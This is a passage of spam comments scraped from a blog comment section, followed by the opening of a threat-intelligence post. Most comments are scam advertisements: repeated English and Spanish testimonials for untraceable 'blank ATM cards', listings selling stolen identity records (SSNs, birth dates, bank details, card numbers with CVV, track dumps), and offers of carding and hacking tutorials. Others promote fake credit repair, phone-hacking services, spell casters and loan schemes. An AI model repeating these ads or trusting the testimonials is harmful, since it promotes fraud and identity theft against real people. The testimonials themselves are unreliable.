  23. POR FAVOR LEA !! Hola chicos !!! Soy Caro, vivo en Ohio, EE. UU. Tengo 32 años, estoy muy feliz de haber recibido mi tarjeta de cajero automático en blanco de Adriano. Mi tarjeta de cajero automático en blanco puede retirar $ 4,000 por día. Lo obtuve de Él la semana pasada y ahora he retirado alrededor de $ 10,000 gratis. El cajero automático en blanco retira dinero de cualquier cajero automático y no tiene nombre porque está en blanco, solo su PIN estará en él, no se puede rastrear y ahora tengo dinero para negocios, compras y suficiente dinero para mí y mi familia. vivo. Estoy muy contento y feliz de haber conocido a Adriano porque conocí a cinco personas antes que él y no pudieron ayudarme. Pero estoy feliz ahora que Adriano envió la tarjeta a través de DHL y la recibí en dos días. Obtenga su propia tarjeta de él en este momento, la está dando por una pequeña tarifa para ayudar a las personas, incluso si es ilegal, pero ayuda mucho y nadie es atrapado o rastreado. Estoy feliz y agradecido con Adriano porque cambió mi historia de repente. La tarjeta funciona en todos los países. Es una buena noticia. La dirección de correo electrónico de Adriano es [email protected]

    ReplyDelete
  24. POR FAVOR LEA !! Hola chicos !!! Soy Caro, vivo en Ohio, EE. UU. Tengo 32 años, estoy muy feliz de haber recibido mi tarjeta de cajero automático en blanco de Adriano. Mi tarjeta de cajero automático en blanco puede retirar $ 4,000 por día. Lo obtuve de Él la semana pasada y ahora he retirado alrededor de $ 10,000 gratis. El cajero automático en blanco retira dinero de cualquier cajero automático y no tiene nombre porque está en blanco, solo su PIN estará en él, no se puede rastrear y ahora tengo dinero para negocios, compras y suficiente dinero para mí y mi familia. vivo. Estoy muy contento y feliz de haber conocido a Adriano porque conocí a cinco personas antes que él y no pudieron ayudarme. Pero estoy feliz ahora que Adriano envió la tarjeta a través de DHL y la recibí en dos días. Obtenga su propia tarjeta de él en este momento, la está dando por una pequeña tarifa para ayudar a las personas, incluso si es ilegal, pero ayuda mucho y nadie es atrapado o rastreado. Estoy feliz y agradecido con Adriano porque cambió mi historia de repente. La tarjeta funciona en todos los países. Es una buena noticia. La dirección de correo electrónico de Adriano es [email protected]

    ReplyDelete
  25. CONTACT 24/7
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > [email protected]

    We are Selling SSN Dob Leads/Fullz/Pros, along with Driving License/ID Number For Tax return & W-2 Form filling, etc.

    **PRICE**
    >>1$ each without DL/ID number
    >>2$ each with DL
    >>5$ each for premium (also included relative info)

    **DETAILS IN LEADs/FULLZ/PROS**

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER WITH EXPIRY DATE
    ->COMPLETE ADDRESS
    ->PHONE NUMBER, EMAIL, I.P ADDRESS
    ->EMPLOYMENT DETAILS
    ->REALTIONSHIP DETAILS
    ->MORTGAGE INFO
    ->BANK ACCOUNT DETAILS

    >All Leads are Spammed & Verified.
    >Fresh spammed data of USA Credit Bureau
    >Good credit Scores, 700 minimum scores
    >Bulk order will be preferable
    >Invalid info found, will be replaced.
    >Payment mode BTC, ETH, LTC, PayPal, USDT & PERFECT MONEY

    ''OTHER GADGETS PROVIDING''

    >SSN+DOB Fullz
    >CC with CVV
    >Dead Fullz
    >Carding Tutorials
    >Hacking Tutorials
    >SMTP Linux Root
    >DUMPS with pins track 1 and 2
    >Sock Tools
    >Server I.P's
    >HQ Emails with passwords

    **Contact 24/7**

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    ReplyDelete
  26. I have been working on rebuilding my credit for about the last 18 months but really focused since around July/August. My credit has dipped as low as 530 and currently I’m at around 480. Last year in September I got a secured Discover card with a $500 limit. I use it regularly for gas and pay it off week to week carrying a very small balance. Today I logged into my app to schedule a payment and found they had converted me to a non secured card and downed my credit limit to $300. I was surprise how did this happened to me so I called to confirm they told me it was due to misinformation on my credit report I went to sort out how to get my credit fixed then I came across [email protected]/ +1 949 397 8437 he wiped out the negatives entries Tax liens DMV car loan and boost my score to 805 and raised my credit limit to $2500 within a couple of days I know this is small to some but for me this feels like such a huge milestone. Give him a try now and get a good credit profile.

    ReplyDelete
  27. My husband and I have been having lots of problems living together, he never gives me attention or makes me happy because he has fallen in love with another woman outside our marriage. I tried my best to make sure that my husband leaves this woman but the more I talk to him about it the more he makes me feel sad and unhappy, My marriage started leading to divorce because he no longer gives me attention. I wanted to forget him but i love him and didn't want to lose him. We have been married for years and he is all I could call a true best friend and best in all, the man that handles my problems perfectly, the man that makes sacrifices for ,my happiness. I wanted him back in my life badly and I was so confused. My Friends told me to buy books about relationships, so I went online for relationship books while I came across a spell caster called Dr Emu. I read testimonies and reviews about him so I contacted him immediately, explained my problems to him. Same day , he casted a spell for me and assured me for 2 days that my husband will return to me and to my greatest surprise the third day my husband came knocking on my door and begged for forgiveness. I am so happy that my love is back again and not only that, we are about to get married again, he proposed. I wouldn't stop talking about him. Contact him today if you need his help via email: [email protected] and you will see that your problem will be solved without any delay. Website: https://emutemple.wordpress.com/

    ReplyDelete
  28. Hello everyone.


    I'm selling fresh leads.
    Details in leads are:


    Full name

    SSN

    DOB

    Phone Numbers

    Address

    City

    State

    Zip

    Residential
    Status
    Account
    Number

    DLnumber

    Emails
    etc


    All leads are genuine, fresh & generated by SPAMMING


    Dealing in almost all types of leads.


    SSNLeads

    DeadFullz

    PremiumLeads

    Mortgage Leads

    BankAccount Detail

    Employee
    Business

    HomeOwners

    DLLeads

    EmailsLeads

    PhoneNumbers Leads


    Interested person contact.Scammers stay away.

    Contact Me:
    Mail: [email protected]
    Telegram: @LeadsproviderUSA

    ReplyDelete
  29. i was lost with no hope for my wife was cheating and had always got away with it because i did not know how or

    always too scared to pin anything on her. with the help a friend who recommended me to who help hack her phone,

    email, chat, sms and expose her for a cheater she is. I just want to say a big thank you to

    [email protected] . am sure someone out there is looking for how to solve his relationship problems, you can also contact him for all sorts of hacking job..he is fast and reliable. you could also text +1 213-295-1376(whatsapp) contact and thank me later

    { all of this above is scam, do not contact with any post, emails, sms, etc }

    ReplyDelete
  30. PLEASE READ!!!

    Hello Guys!! I am Caro I live in Ohio USA I'm 32 years old, am so happy I got my blank ATM card from Adriano. My blank ATM card can withdraw $4,000 daily. I got it from Him last week and now I have withdrawn about $10,000 for free. The blank ATM withdraws money from any ATM machines and there is no name on it because it is blank just your PIN will be on it, it is not traceable and now I have money for business, shopping and enough money for me and my family to live on.I am really glad and happy i met Adriano because I met Five persons before him and they could not help me. But am happy now Adriano sent the card through DHL and I got it in two days. Get your own card from him right now, he is giving it out for small fee to help people even if it is illegal but it helps a lot and no one ever gets caught or traced. I’m happy and grateful to Adriano because he changed my story all of a sudden. The card works in all countries that is the good news Adriano’s email address is [email protected]

    ReplyDelete
  31. PLEASE READ!!!

    Hello Guys!! I am Caro I live in Ohio USA I'm 32 years old, am so happy I got my blank ATM card from Adriano. My blank ATM card can withdraw $4,000 daily. I got it from Him last week and now I have withdrawn about $10,000 for free. The blank ATM withdraws money from any ATM machines and there is no name on it because it is blank just your PIN will be on it, it is not traceable and now I have money for business, shopping and enough money for me and my family to live on.I am really glad and happy i met Adriano because I met Five persons before him and they could not help me. But am happy now Adriano sent the card through DHL and I got it in two days. Get your own card from him right now, he is giving it out for small fee to help people even if it is illegal but it helps a lot and no one ever gets caught or traced. I’m happy and grateful to Adriano because he changed my story all of a sudden. The card works in all countries that is the good news Adriano’s email address is [email protected]

    ReplyDelete
  32. ALL THANKS TO DOCTOR0LOVESPELL I have been in bondage ever since my ex leave for another woman, It was really hell for me and everybody told me to forget about him but i could not because i love him so much, Things get worse until my friend introduced me to this great spell caster Dr. 0love who have save so many life and relationships and i contacted him through his email [email protected] or whatsapp him on: +12017812375 i explain everything to him and he cast a spell for me immediately after 24 hours, everything turn around and my boyfriend came back to me on his knee begging for forgiveness that i am the one and only woman in his life now. i was surprise i have never seen such a miracle in my life. I am so thankful to this man and i will forever publish his name Dr 0love visit his FB page: https://www.facebook.com/Lovespellthatworkfastusa or view his website: https://doctor0lovespell.wordpress.com/

    ReplyDelete
  33. Do you need Personal Finance?
    Business Cash Finance?
    Unsecured Finance
    Fast and Simple Finance?
    Quick Application Process?
    Finance. Services Rendered include,
    *Debt Consolidation Finance
    *Business Finance Services
    *Personal Finance services Help
    contact us today and get the best lending service
    personal cash business cash just email us below
    Contact Us: [email protected]
    call or add us on what's app +918929509036

    ReplyDelete
  34. **SELLING SSN+DOB FULLZ**

    CONTACT
    Telegram > @leadsupplier
    ICQ > 752822040
    Email > [email protected]

    >>1$ each without DL/ID number
    >>2$ each with DL
    >>5$ each for premium (also included relative info)

    *Will reduce price if buying in bulk
    *Hope for a long term business

    FORMAT OF LEADS/FULLZ/PROS

    ->FULL NAME
    ->SSN
    ->DATE OF BIRTH
    ->DRIVING LICENSE NUMBER WITH EXPIRY DATE
    ->COMPLETE ADDRESS
    ->PHONE NUMBER, EMAIL, I.P ADDRESS
    ->EMPLOYMENT DETAILS
    ->REALTIONSHIP DETAILS
    ->MORTGAGE INFO
    ->BANK ACCOUNT DETAILS

    >Fresh Leads for tax returns & w-2 form filling
    >Payment mode BTC, ETH, LTC, PayPal, USDT & PERFECT MONEY

    ''OTHER GADGETS PROVIDING''

    >SSN+DOB Fullz
    >CC with CVV
    >Photo ID's
    >Dead Fullz
    >Spamming Tutorials
    >Carding Tutorials
    >Hacking Tutorials
    >SMTP Linux Root
    >DUMPS with pins track 1 and 2
    >Sock Tools
    >Server I.P's
    >HQ Emails with passwords

    Email > [email protected]
    Telegram > @leadsupplier
    ICQ > 752822040

    THANK YOU

    ReplyDelete
  35. ¿Sufre económicamente o necesita efectivo urgente para pagar su
    ¿facturas? No te preocupes más porque, ahí fuera, puedes ganar dinero sin estrés. Puedes cambiar tu vida en solo 18 horas. comuníquese con nosotros para obtener una [TARJETA INTELIGENTE DE ATM] en blanco hoy y sea uno de los afortunados que se benefician de estas tarjetas. Esta tarjeta ATM INTELIGENTE en blanco PROGRAMADA es capaz de piratear cualquier cajero automático, en cualquier parte del mundo. Me enteré de esta TARJETA DE ATM EN BLANCO cuando estaba buscando un prestamista de préstamos en línea hace aproximadamente un mes. Realmente cambió mi vida para siempre y ahora puedo quitarme a mi familia.
    Lo mínimo que obtengo en un día con esta tarjeta es de aproximadamente $ 1500.
    Todos los días tengo suficiente dinero para cuidar de mi familia.
    Aunque es ilegal, no hay riesgo de ser atrapado, porque tiene
    ha sido programado de tal manera que no es rastreable, y también
    hace que el CCTV sea inútil cuando está retirando dinero. Para obtener detalles sobre cómo obtener una tarjeta hoy, envíe un correo electrónico a los piratas informáticos en
    Wandyhacke[email protected]

    ReplyDelete

The Gh0st Remains the Same

Author:  Danny Adamitis   Executive Summary  Prevailion’s Tailored Intelligence Team has detected a new advanced campaign dubbed - “...